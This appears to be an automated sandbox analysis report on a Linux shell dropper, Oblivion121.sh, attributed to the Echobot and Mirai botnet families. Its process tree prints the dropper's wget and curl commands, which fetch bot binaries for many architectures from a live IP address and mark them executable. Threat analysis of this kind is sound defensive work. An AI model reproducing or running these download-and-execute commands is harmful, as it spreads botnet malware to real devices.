Analysis
-
max time kernel
149s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
29/03/2025, 15:48
Static task
static1
Behavioral task
behavioral1
Sample
Oblivion121.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
Oblivion121.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
Oblivion121.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
Oblivion121.sh
-
Size
1KB
-
MD5
506ea803fdb2d5a593683fe98fec6f1f
-
SHA1
f71d6ccbfd48bff6ba7c06a7250e137f5ab75066
-
SHA256
71451b64fc1acf7e50295e14859f7957966210efb8351a26882f96781aa7c4e1
-
SHA512
213cf82427a6b073293b65f0745fa5bc95e24c7f684aec2f97b7548d4d099c0a0251f691d4a514818da6ad5b6674c55549eaa960a7ac7e2d28ee391d9d626fc5
Malware Config
Signatures
-
Detected Echobot 1 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_echobot -
Echobot family
-
Mirai family
-
Contacts a large (169840) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1611 chmod 1821 chmod 1835 chmod 1867 chmod 1568 chmod 1582 chmod 1853 chmod 1524 chmod 1538 chmod 1554 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/cp 1525 Oblivion121.sh /tmp/cp 1539 Oblivion121.sh /tmp/cp 1555 Oblivion121.sh /tmp/cp 1569 Oblivion121.sh /tmp/cp 1583 Oblivion121.sh /tmp/cp 1612 Oblivion121.sh /tmp/cp 1822 Oblivion121.sh /tmp/cp 1836 Oblivion121.sh /tmp/cp 1854 Oblivion121.sh /tmp/cp 1868 Oblivion121.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog Oblivion121.sh File opened for modification /dev/watchdog Oblivion121.sh -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp Oblivion121.sh -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 10 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 1525 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1539 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1555 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1569 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1583 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1612 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1822 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1836 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1854 Oblivion121.sh Changes the process name, possibly in an attempt to hide itself 1868 Oblivion121.sh -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp Oblivion121.sh -
description ioc Process File opened for reading /proc/479/fd Oblivion121.sh File opened for reading /proc/671/fd Oblivion121.sh File opened for reading /proc/1142/fd Oblivion121.sh File opened for reading /proc/1319/fd Oblivion121.sh File opened for reading /proc/1691/fd Oblivion121.sh File opened for reading /proc/1855/fd Oblivion121.sh File opened for reading /proc/597/fd Oblivion121.sh File opened for reading /proc/681/fd Oblivion121.sh File opened for reading /proc/1022/fd Oblivion121.sh File opened for reading /proc/1134/fd Oblivion121.sh File opened for reading /proc/1556/fd Oblivion121.sh File opened for reading /proc/505/exe Oblivion121.sh File opened for reading /proc/1754/fd Oblivion121.sh File opened for reading /proc/1757/fd Oblivion121.sh File opened for reading /proc/611/fd Oblivion121.sh File opened for reading /proc/913/fd Oblivion121.sh File opened for reading /proc/961/fd Oblivion121.sh File opened for reading /proc/975/fd Oblivion121.sh File opened for reading /proc/1070/fd Oblivion121.sh File opened for reading /proc/1262/fd Oblivion121.sh File opened for reading /proc/1300/fd Oblivion121.sh File opened for reading /proc/1526/fd Oblivion121.sh File opened for reading /proc/1085/fd Oblivion121.sh File opened for reading /proc/477/fd Oblivion121.sh File opened for reading /proc/495/fd Oblivion121.sh File opened for reading /proc/510/exe Oblivion121.sh File opened for reading /proc/538/exe Oblivion121.sh File opened for reading /proc/559/exe Oblivion121.sh File opened for reading /proc/1629/fd Oblivion121.sh File opened for reading /proc/1823/fd Oblivion121.sh File opened for reading /proc/1/fd Oblivion121.sh File opened for reading /proc/506/fd Oblivion121.sh File opened for reading /proc/1057/fd Oblivion121.sh File opened for reading /proc/1074/fd Oblivion121.sh File opened for reading /proc/1126/fd Oblivion121.sh File opened for reading /proc/1155/fd Oblivion121.sh File opened for reading /proc/1649/fd Oblivion121.sh File opened for reading /proc/1677/fd Oblivion121.sh File opened for reading /proc/1362/fd Oblivion121.sh File opened for reading /proc/1762/fd Oblivion121.sh File opened for reading /proc/1642/exe Oblivion121.sh File opened for reading /proc/1027/fd Oblivion121.sh File opened for reading /proc/1164/fd Oblivion121.sh File opened for reading /proc/1198/fd Oblivion121.sh File opened for reading /proc/1542/fd Oblivion121.sh File opened for reading /proc/479/exe Oblivion121.sh File opened for reading /proc/506/exe Oblivion121.sh File opened for reading /proc/1669/fd Oblivion121.sh File opened for reading /proc/1732/fd Oblivion121.sh File opened for reading /proc/427/fd Oblivion121.sh File opened for reading /proc/437/fd Oblivion121.sh File opened for reading /proc/1282/fd Oblivion121.sh File opened for reading /proc/1605/fd Oblivion121.sh File opened for reading /proc/1623/fd Oblivion121.sh File opened for reading /proc/1651/fd Oblivion121.sh File opened for reading /proc/1695/fd Oblivion121.sh File opened for reading /proc/1698/fd Oblivion121.sh File opened for reading /proc/545/fd Oblivion121.sh File opened for reading /proc/722/fd Oblivion121.sh File opened for reading /proc/1151/fd Oblivion121.sh File opened for reading /proc/1185/fd Oblivion121.sh File opened for reading /proc/1687/fd Oblivion121.sh File opened for reading /proc/1703/fd Oblivion121.sh File opened for reading /proc/1809/fd Oblivion121.sh -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1529 wget 1536 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jade420.arm4 curl File opened for modification /tmp/jade420.arm5 curl File opened for modification /tmp/jade420.m68k curl File opened for modification /tmp/jade420.x86 wget File opened for modification /tmp/jade420.x86 curl File opened for modification /tmp/jade420.arm5 wget File opened for modification /tmp/jade420.arm6 wget File opened for modification /tmp/jade420.arm6 curl File opened for modification /tmp/cp Oblivion121.sh File opened for modification /tmp/jade420.arm7 wget File opened for modification /tmp/jade420.arm7 curl File opened for modification /tmp/jade420.sh4 wget File opened for modification /tmp/jade420.sh4 curl File opened for modification /tmp/jade420.mpsl curl File opened for modification /tmp/jade420.ppc wget File opened for modification /tmp/jade420.ppc curl File opened for modification /tmp/jade420.m68k wget File opened for modification /tmp/jade420.mips wget File opened for modification /tmp/jade420.mips curl File opened for modification /tmp/jade420.mpsl wget
Processes
-
/tmp/Oblivion121.sh/tmp/Oblivion121.sh1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1517 -
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.x862⤵
- Writes file to tmp directory
PID:1518
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.x862⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/catcat jade420.x862⤵PID:1523
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-iC1FF52⤵
- File and Directory Permissions Modification
PID:1524
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1529
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1536
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.mips jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-iC1FF52⤵
- File and Directory Permissions Modification
PID:1538
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.mpsl2⤵
- Writes file to tmp directory
PID:1545
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.mpsl2⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.mips jade420.mpsl jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-iC1FF52⤵
- File and Directory Permissions Modification
PID:1554
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm42⤵PID:1559
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm42⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.arm4 jade420.mips jade420.mpsl jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-iC1FF52⤵
- File and Directory Permissions Modification
PID:1568
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm52⤵
- Writes file to tmp directory
PID:1573
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm52⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.arm4 jade420.arm5 jade420.mips jade420.mpsl jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-iC1FF52⤵
- File and Directory Permissions Modification
PID:1582
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm62⤵
- Writes file to tmp directory
PID:1587
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm62⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.mips jade420.mpsl jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-MG4bXi systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp72⤵
- File and Directory Permissions Modification
PID:1611
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm72⤵
- Writes file to tmp directory
PID:1812
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm72⤵
- Writes file to tmp directory
PID:1819
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-MG4bXi systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-rtkit-daemon.service-EZyIGC systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-hostnamed.service-Qep7sB systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-localed.service-amIUD5 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp72⤵
- File and Directory Permissions Modification
PID:1821
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.ppc2⤵
- Writes file to tmp directory
PID:1826
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.ppc2⤵
- Writes file to tmp directory
PID:1833
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.ppc jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-MG4bXi systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-rtkit-daemon.service-EZyIGC systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-hostnamed.service-Qep7sB systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-localed.service-amIUD5 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp72⤵
- File and Directory Permissions Modification
PID:1835
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.m68k2⤵
- Writes file to tmp directory
PID:1844
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.m68k2⤵
- Writes file to tmp directory
PID:1851
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-MG4bXi systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-rtkit-daemon.service-EZyIGC systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp72⤵
- File and Directory Permissions Modification
PID:1853
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.sh42⤵
- Writes file to tmp directory
PID:1858
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.sh42⤵
- Writes file to tmp directory
PID:1865
-
-
/bin/chmodchmod +x config-err-dB3BHa cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.sh4 jade420.x86 netplan_ke6ktkgw Oblivion121.sh snap-private-tmp systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-MG4bXi systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-rtkit-daemon.service-EZyIGC systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp72⤵
- File and Directory Permissions Modification
PID:1867
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD5ca9c4fc72ea948856f5a37956f167bfc
SHA1a689a0fc903757672b777dda4f82a8688556d333
SHA25696f4ce7b2e797678dab4ccafd828ace3718b945bfe8a05357688a5cd2d166fc4
SHA512900e34ae8667a6cea737e5a16c3143d9ab8e20a3f466bc6b616bf47fc961809bfd3ffcdc938c0941c4209ac3ed4af2066d82942dd45e05f78199e87d9a87ddf2